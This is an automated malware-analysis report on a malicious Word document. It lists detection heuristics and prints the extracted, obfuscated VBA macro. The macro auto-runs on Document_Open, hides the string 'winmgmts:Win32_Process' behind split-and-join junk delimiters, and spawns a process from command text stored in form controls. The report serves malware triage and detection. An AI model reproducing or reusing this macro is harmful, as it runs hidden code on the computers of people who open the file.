MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7469465-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469465-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Oxpdajwxwikn = GetObject(Cnmwribhmd) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13076 bytes |
SHA-256: e70494f37e1c50eff52f2e5b18f9989bc0992a8ec39f1464f8017744e7e45d9f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
399 of 618 identifiers look randomly generated (e.g. 'hnkjKHK2222NNKLSess_') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Erlcmaacrjkht"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Jwlvepwqwmy, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Nhbvbylgmem As Boolean
Dim Cajjbivcp As Double
Audfypjyz = Vukpzfspne
Qhhaesplytvu = (Fiwvoiosfpym)
Jzaagbmxroe = 933
Dim Hlcyqiezkt As Double
Mdycrcsjzby = "Consequatur voluptatem non iusto."
Dim Oeiiqhqiyhgc As Integer
Dim Efrzghjty As Boolean
Dim Zmmvkfnjcbdv As Boolean
Lbinvrzaunei = (404)
Dim Kmugumrvemnc As Integer
Dim Ogajzfvfagcx As Double
Syrcdwyqhxbec = Vztyglnnuiwwe
Dim Exqrcfvlyxu As Integer
Dim Ciucfifgiypne As Boolean
Dim Tgatfttdoknra As Integer
Alnplmouqwgh = (Bdyvyrswbtfje)
Sqernxeapzjf = ("Bessie")
Xylxfmhpwb = (Djujbhhb)
Dim Bqhawdivo As Boolean
Neuulztld = Ultuggxc
Hoyjjbxoslyxe
Dim Xrinidnqlq As String
Dim Bkhxacvp As Integer
Qpknowcalfaj = Qlkvaqslgvz
Gqssukfbsc = (Rnlfocsqtho)
Ojzejpnj = 256
Dim Ktmfzomxiogjc As Boolean
Sshnsybar = "Corrupti."
Dim Fwjmhfhr As Boolean
Dim Bxscgjfduf As Double
Dim Xqxgwrxitvyy As String
Ovhbclfvqvo = (665)
Dim Pvwxbumysp As String
Dim Ptsrgyttqu As Boolean
Tcvmczcrlfhnw = Ewrvgfrnrndkw
Dim Wuladyzzwsn As Double
Dim Jmevhapxyzdrb As String
Dim Zyofwujn As Double
Uzfxvcsutdfii = (Ftxvhjciuaxeh)
Azcynbka = ("Quis et magni quibusdam.")
Kwhmzqqljqalr = (Sqkwxylgpdf)
Dim Puvtuyxnuw As Double
Hsyydohilv = Dfyzpsjtkgwpu
End Sub
Attribute VB_Name = "Ykxhhqeiphnk"
Attribute VB_Base = "0{99811786-DD74-4A42-9BCA-65C97DC86D37}{7C709F61-1009-445B-992D-B64AB609621C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Nidmcturqvl"
Function Qcdlffgykm()
Dim Wpbevfmvc As Boolean
Dim Mdpyoxnm As Integer
Tlwvbyuezof = Huyqkjavzh
Xwflbepg = (Deithrrc)
Isiepgcdsuuek = 336
Dim Bpsyjpys As String
Thqcidwsore = "Asperiores enim aperiam rerum sit doloribus sit."
Dim Vubmnyiz As Double
Dim Qfczdehjaeo As Double
Dim Lakqxlwdynoxe As String
Ktvqauax = (60)
Dim Tohhejnzv As Integer
Dim Dhloxkrroc As String
Dzgjxveldeldw = Uebxirshlkcc
Dim Frcusdiyap As Integer
Dim Fhywhriowmne As Boolean
Dim Lruyusubx As Integer
Jekmweltqm = (Pcluvmsexc)
Rdbukxdklmxm = ("Quibusdam totam dolore.")
Aibkarbh = (Jyypeilgrsusc)
Dim Tjaxdeywtl As Double
Mcvqkyel = Ofdaqvfhhfkbg
Kzwdjrnpdskn = Erlcmaacrjkht.Jwlvepwqwmy
Dim Xbbdoppxng As Integer
Dim Ikzitzalujndq As Double
Rwzrkdwrwc = Djsahzjezwcmo
Pnoxnydxanpzv = (Cfpcxbbjfehl)
Tndieheieqyz = 968
Dim Msznsgtwwlex As String
Itgmrchz = "Michele"
Dim Reouazeypjw As Boolean
Dim Tsfbxrreg As String
Dim Zlklhjln As Boolean
Vorzvwhfh = (581)
Dim Vpmtmbkht As Boolean
Dim Louppsrgyj As Boolean
Xenbbvkyyptew = Uibfmvkddfgg
Dim Bfypsppyzim As String
Dim Nvvqtrawyxd As String
Dim Nbkwvovk As String
Vpdicwjssd = (Hiomposdhuvsc)
Cnyndqkzbqj = ("Impedit ea ducimus veritatis.")
Pflptqtbiizhr = (Atlfpige)
Dim Dgwinwfqsnc As Double
Zmtmuezfl = Yhediriar
Cqqgkgebwjqma = Kzwdjrnpdskn + Ykxhhqeiphnk.Owyaiedlavwrr + Ykxhhqeiphnk.Gcbaeextcqr + Ykxhhqeiphnk.Lwvjxbiwjz
Dim Smdnkkwmgopk As Boolean
Dim Qsnsishsrfb As Double
Wbmrrwgn = Lsclcpqewwv
Inbjmavxmegal = (Ynacaebafgfca)
Jincdepmt = 835
Dim Qzowlqwugiwt As Boolean
Gmwcgxuwguxm = "Recusandae officia in voluptatem."
Dim Ribgpgocmiv As Integer
Dim Gvwmpfjxs As String
Dim Mpztstzyig As Integer
Hqeceeangrqnb = (878)
Dim Hhzszprtz As Integer
Dim Jsixhaexpwld As Double
Rfdvzmsjksrj = Ipwewjuh
Dim Kqjdtmveuz As Integer
Dim Nyzucaiqgy As String
Dim Pzzgguyk As Double
Kjcppywnoouy = (Fbhtyodmehntm)
Zbxjtnqrmkkus = ("Earum doloremque consequuntur est omnis minus.")
Hrxcbfmelmqyf = (Vlhponxo)
Dim Okuioukcgz As Boolean
Kmsnwlxcplvkp = Dukkdpsnur
Wgghigccbtc = Cqqgkgebwjqma + Ykxhhqeiphnk.Anrnjpcd + Ykxhhqeiphnk.Pnbqkntptofd.Tag
Dim Bpfxuprnyhv As Boolean
Dim Jsqxrvfne As Double
Bwtrcxqt = Crhvmgitqoplv
Ohzvwbwmewxvz = (Rczggbjb)
Wunolpbmvoq = 291
Dim Byfedzoliipxn As Double
Auffvhzhjyt = "Dolorem vitae."
Dim Jevkaeyhaxfcp As String
Dim Lxqxdmlbjlu As String
Dim Rwfjssce As Integer
Wjnhaxzdg = (84)
Dim Vlhwcjxcmz As String
Dim Vqerwjwbjys As Double
Qfldkhomrvk = Qjebafqvrrv
Dim Tjcbxtnh As Double
Dim Mybrraeu As Double
Dim Itnwhxmesynp As String
Ofkpxrkfe = (Cznzumwbmtav)
Agipnqwatdlq = ("Nathan")
Cidpidexzfymr = (Onjeuxlbqq)
Dim Cfknexzzdqlnb As String
Hdqbziof = Luzqhmyu
Qcdlffgykm = Eaehxywvguw + Wgghigccbtc + Eaehxywvguw
Dim Wnqeobzuxeub As Integer
Dim Tmacbywzwjf As Boolean
Hxpctxxizdjph = Phjcrgogfbh
Wqhzrcrwhbbdt = (Jqnuhgkoacfr)
Kbliyljwkye = 251
Dim Ighyybuxponh As String
Bhwllyfwaq = "Qui."
Dim Tknfpphncise As Double
Dim Ytvnxbgzioo As Boolean
Dim Bnlgredikkjy As String
Dkspsevz = (973)
Dim Mstntcyr As Integer
Dim Gaqcazdhojmoz As Double
Ppzvhwbc = Zkpoilrvaudt
Dim Sbolboytsle As Double
Dim Vuaeygjaontgy As Boolean
Dim Ygzwzkdgiqav As Double
Sejvnwaap = (Hodoveduful)
Mososoxko = ("In dignissimos non odit dignissimos incidunt repudiandae ut.")
Ijkkysyrtjswz = (Lxbplgsbiz)
Dim Haicttggmu As Integer
Mwtszurswfdzj = Pphblugqrl
End Function
Function Hoyjjbxoslyxe()
Dim Onczecsprhcfq As String
Dim Qinxcylsuvulx As Boolean
Kqyefoswtuj = Drecynnqxoma
Hdkrudcwmgmo = (Ltdsstpcrsmky)
Bmddtktjcpc = 476
Dim Fxqkeqedl As Integer
Jgfmsfkfd = "Quod et libero et dolore corporis."
Dim Uilqnskacp As Boolean
Dim Xubcfiujq As Double
Dim Tnfhqxexmyvc As String
Ocmtlrsfxhrqc = (199)
Dim Iytcmrdhktcys As Double
Dim Brudqfhqea As Boolean
Pxpzvzadzbz = Lubzisann
Dim Wyorbipckdokv As Boolean
Dim Zrnkaszwf As String
Dim Rwhcabrpc As Boolean
Jcqmxkdxkg = (Tizdfhxc)
Vrsuhdmsf = ("Jeffrey")
Oiltovotia = (Vntaymhftb)
Dim Ztcdakrao As Boolean
Aojrmjjag = Xgodogxlr
iwoowjjjjj = "_&&*8992307&)hnkjKHK2222NNKLS"
Dim Dwufvaamri As Integer
Dim Pyxduabcmlk As Double
Anatmnjhmuz = Hwujpgknkze
Xxkzsmwrvmzsf = (Hcexbese)
Wdnbqowz = 873
Dim Lxmbneymjvq As String
Gfhugrvftc = "Ullam veniam incidunt ex."
Dim Ijpeyctsfskpc As Integer
Dim Fgvmnmrgwitqi As Boolean
Dim Ruqfevjhls As Boolean
Gnurswupyyq = (874)
Dim Qcswemlbva As Boolean
Dim Xfcvzjuqvltcq As Integer
Nbltdhunsrkg = Pkmdsurstz
Dim Tpejqgdtxzjhm As String
Dim Rjeododf As String
Dim Yxhcvhmfh As Integer
Iiaecmoqa = (Brzipkkhpkd)
Iwrbrxbfcxjb = ("Et.")
Acpoaahwpc = (Bvazvffiwgun)
Dim Elyuqglb As String
Zvccjmgoo = Gfdbevvnuhcpx
Pvjebntni = Split("_&&*8992307&)hnkjKHK2222NNKLSwi_&&*8992307&)hnkjKHK2222NNKLSnm_&&*8992307&)hnkjKHK2222NNKLSgmt_&&*8992307&)hnkjKH" + "K2222NNKLSs:W_&&*8992307&)hnkjKHK2222NNKLSin_&&*8992307&)hnkjKHK2222NNKLS32_" + Erlcmaacrjkht.Jwlvepwqwmy + "_&&*8992307&)hnkjKHK2222NNKLSroc_&&*8992307&)hnkjKHK2222NNKLSess_&&*8992307&)hnkjKHK2222NNKLS", iwoowjjjjj)
Dim Vupogwlkblzi As Double
Dim Chetjjhwlh As Double
Vlkpcxdbcgeir = Ccfiddjojg
Znzjijkaaa = (Cexjvdvcua)
Fybslxajcndn = 6
Dim Vyhpicqwgzfzs As Boolean
Wqzjfdjiro = "Consequatur nihil sint excepturi ut animi excepturi in ea ut."
Dim Cgoakhxhwuerb As Double
Dim Rcnmevyfxe As String
Dim Umqqagdnpsyvs As Boolean
Nclhictrgecxd = (655)
Dim Rvfkcvge As Integer
Dim Xpuzdrtjxl As Integer
Wwtbujmyiz = Bcphscgxgwk
Dim Sdmiogsxfzjqb As Boolean
Dim Sgcxfgyablque As Double
Dim Zlgccgzpu As Boolean
Qwdfrqbjeau = (Stckwxmnr)
Ykzyrsqienqcw = ("Brenda")
Asvbefzxjidp = (Gdzwdhhrcsmkl)
Dim Crfocxtspvuy As String
Qndxmykqgtn = Pdputrdhqx
Cnmwribhmd = Join(Pvjebntni, "")
Dim Vgapushyqlvee As Integer
Dim Cdzebdio As String
Bchkisyicg = Gnibcuhqk
Iugecbtn = (Ftqzohtxvb)
Vxlvaaoh = 359
Dim Aaypcovhjtlya As Boolean
Bomntpzeizjt = "Leigh"
Dim Szkjgspb As String
Dim Ebnreoxxq As Boolean
Dim Lbtgkbwpqsuog As Double
Botccaqhirbh = (577)
Dim Cmcdchxqcwrt As String
Dim Mjnhajnid As Double
Yvtkoitv = Gslejwkmxki
Dim Vzeuhqhtj As Boolean
Dim Dlefnnxy As Double
Dim Frccqncvfdtk As String
Lkomfouxdjays = (Knkxophcrqdey)
Itxftdylsc = ("Facere veniam quis.")
Nsbrvxxvq = (Zjehxvcjwut)
Dim Bmlvmbruo As Integer
Kpyihahuagxw = Apqtdouruqilb
Set Oxpdajwxwikn = GetObject(Cnmwribhmd)
Dim Abrwllssfedjm As Boolean
Dim Zewvxbfk As Boolean
Zriejtlbz = Arfkzimoabod
Yymhuurd = (Tjowkrhnbj)
Qkyttwneko = 294
Dim Lvzuesax As Boolean
Qqtqdiubbtdl = "Christian"
Dim Jbbvpmaf As Boolean
Dim Kpsniiialw As Boolean
Dim Zcsejimnz As String
Xkdqfhotlmi = (174)
Dim Qhttkczlhbb As Boolean
Dim Kcrspmlb As Boolean
Fscsxcju = Eocptcwzcqjbs
Dim Mcsxwumwfnbij As Boolean
Dim Ygkbxwzczn As Double
Dim Zeseazvlaq As Integer
Dsrxbsumxtrc = (Famatjginrm)
Ioqihipy = ("Quas aut repellendus est consectetur nulla non qui adipisci.")
Cahtcogmq = (Tvzaxoouea)
Dim Rlygkkuasavk As Integer
Qduhfvvrot = Jubdaeqip
Kecjwbbcrczed = Cnmwribhmd + Ykxhhqeiphnk.Lzpmrcefp.ControlTipText + Ykxhhqeiphnk.Htuuqdwjrhs.ControlTipText
Dim Srbduyalgzjfe As String
Dim Rlyqinhzzse As Integer
Addislvuqmtab = Utyexgqgh
Mlsblqidldv = (Sswazephncf)
Zsqjwwrdzkcp = 150
Dim Rxobzskm As String
Qhcahyjmvr = "Nam corporis voluptates esse molestiae nihil."
Dim Ncgzjksiuly As Integer
Dim Kzafojnogsptq As Integer
Dim Bptjnbkl As Boolean
Iztwpfib = (491)
Dim Yjhhhcbgjqfsp As Boolean
Dim Erpovanef As Double
Urqnhsnyds = Bkadceuqkb
Dim Nsnhwkebcx As Boolean
Dim Pwjnfqoowf As Integer
Dim Vwlakpzs As Integer
Zofgbsngk = (Pogvhltn)
Ifjlzzeqnxp = ("Rerum.")
Wviyovbqvj = (Ifedefeas)
Dim Vubtjpxgmh As String
Azmfszxnwh = Uznirkhrgmm
Jrqzrkjyonpu = Kecjwbbcrczed + Erlcmaacrjkht.Jwlvepwqwmy
Dim Uqlzyfgghwf As Boolean
Dim Hiboyphdfedt As String
Pigztcdpsl = Ilobbvlbppcer
Lolifssry = (Lborqquzgvpdd)
Dwafchiur = 61
Dim Cogpupbej As String
Yzmjsemwlia = "Molestiae."
Dim Vrtxodgwqjn As Boolean
Dim Qazcyyyqyast As Integer
Dim Ivpxcrru As String
Dpfdqhpydznlw = (216)
Dim Byywqadzzx As Double
Dim Mlocwxdy As Integer
Vzrktqqqxzgn = Sxnvzpgfpgdn
Dim Roskaicyefgnj As String
Dim Buykujzj As Double
Dim Tmpklhgbszigw As Double
Qushomgxfolf = (Orekmhvnotxa)
Jrvylreogbu = ("Beatae.")
Ojvaccgehev = (Xcgzjnzpo)
Dim Ntmqzlcqzugd As String
Vyflbnzogubi = Gnxavcmjqqfw
Set Hoyjjbxoslyxe = GetObject(Jrqzrkjyonpu)
Dim Nqmuxfhulx As Integer
Dim Kpufgkre As String
Tqjdejqdrhl = Hvtbpkubxbf
Kngvalay = (Lubxdhftpnxmk)
Cupnvoewaz = 272
Dim Vgawtkzihomqu As Integer
Ptgxdumyq = "Cumque recusandae."
Dim Bhhyayakkn As String
Dim Eckdbnhytdho As Double
Dim Cadihkkiisbj As Boolean
Qkhuabbusqk = (280)
Dim Mrxatvgvz As String
Dim Fegwuscs As Double
Ijwnnashhmyx = Qksinhsqcgowu
Dim Znrkpeib As String
Dim Vnnsudici As Boolean
Dim Aufsargpyq As Boolean
Hhygmmuijfc = (Eyicgtmzrztm)
Mcloppzgkvx = ("Voluptate.")
Nxavsmywsxm = (Spqiftuyhgxqn)
Dim Yonfkczbqeaz As Boolean
Ueywrwkqbpdb = Rcefjexek
Hoyjjbxoslyxe.XSize = False
Dim Olmteyhmrm As Integer
Dim Escflauhxgkz As String
Camnlzhcqxrug = Tmmbtnwk
Ygnliammhvgae = (Lbbenrtv)
Tyyokgqz = 901
Dim Suriwfhzeut As Double
Yhlvfzielg = "Consequatur explicabo temporibus quidem."
Dim Coywppbrokr As Integer
Dim Iijuqmklnagy As Double
Dim Afihnjuuqj As Double
Erqwnpbcxqy = (853)
Dim Twcoorxeeblf As String
Dim Aynsarbi As Boolean
Rmqxiojgynun = Crfkaqfrl
Dim Djyyssld As Boolean
Dim Cbavqregojnhh As Double
Dim Mqhcpaaexf As Boolean
Igvikijaqe = (Zakwdmvcip)
Daswbxcq = ("Dignissimos ullam sapiente.")
Vatadyyps = (Xdppeakj)
Dim Tztfjqmy As Double
Yytejccj = Twzagwdg
Hoyjjbxoslyxe.YSize = False
Dim Qatefyuxevxhv As Integer
Dim Slntamzrl As Integer
Idveodulfgcbk = Nezkpdedfusig
Iibhqrbahunk = (Qkdoazus)
Udzpjvvoboy = 8
Dim Coildrqcsybpk As Boolean
Fkwphonmrlql = "Voluptatum at quis."
Dim Irdwkbasnrbkk As String
Dim Xazhcjrri As Boolean
Dim Obqamgrejh As Integer
Znsnwfowdmht = (20)
Dim Ewpraujznzbn As Boolean
Dim Tgrxzgzujvul As Boolean
Ibtxovcupsg = Aztmjbtcwu
Dim Esjntwoatqlg As String
Dim Isyrzqwwyupjk As Integer
Dim Nmhjcjcs As Integer
Vscqkonilsbe = (Tyhtpxkmdzfee)
Ofzrwdyt = ("Ut molestias eos quia quia voluptatum.")
Fcazrzjhlpe = (Cjljodlfkp)
Dim Mbmisuebekujn As Boolean
Wwshwmwwhkujq = Untcfxwztu
Do While Oxpdajwxwikn.Create(KSNNSN & Qcdlffgykm, Eekulpmk, Hoyjjbxoslyxe, Lbhttlvfk)
Loop
Dim Wmcitsjivedkr As Boolean
Dim Kwmklsnl As String
Sqsenudjumqf = Dsfqnrfhoybr
Phibtqabqdik = (Xxlftugt)
Yrmlbucvgjtmd = 572
Dim Nqccchcsfj As Integer
Wytnwvkdbd = "Consequatur itaque id aut."
Dim Vamdqgktwsfde As Boolean
Dim Qvzhbkhgxn As Double
Dim Rtlkjbdgbuzcy As Double
Pdspjekuicwnp = (629)
Dim Pquitzlhwcbl As Integer
Dim Vxidlscexmsgz As Integer
Mnnsgeihqf = Vwnitcyme
Dim Dvsltiqmah As Double
Dim Onscrmprxm As String
Dim Hkeyebqey As Double
Xotpzasyww = (Vbzgzowmrildj)
Hzrukkcunyx = ("Maureen")
Eoqjulixeurp = (Spcpgvilyfc)
Dim Shlicyehdrc As Double
Vudfzfjtjfliq = Tplhswqpsl
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.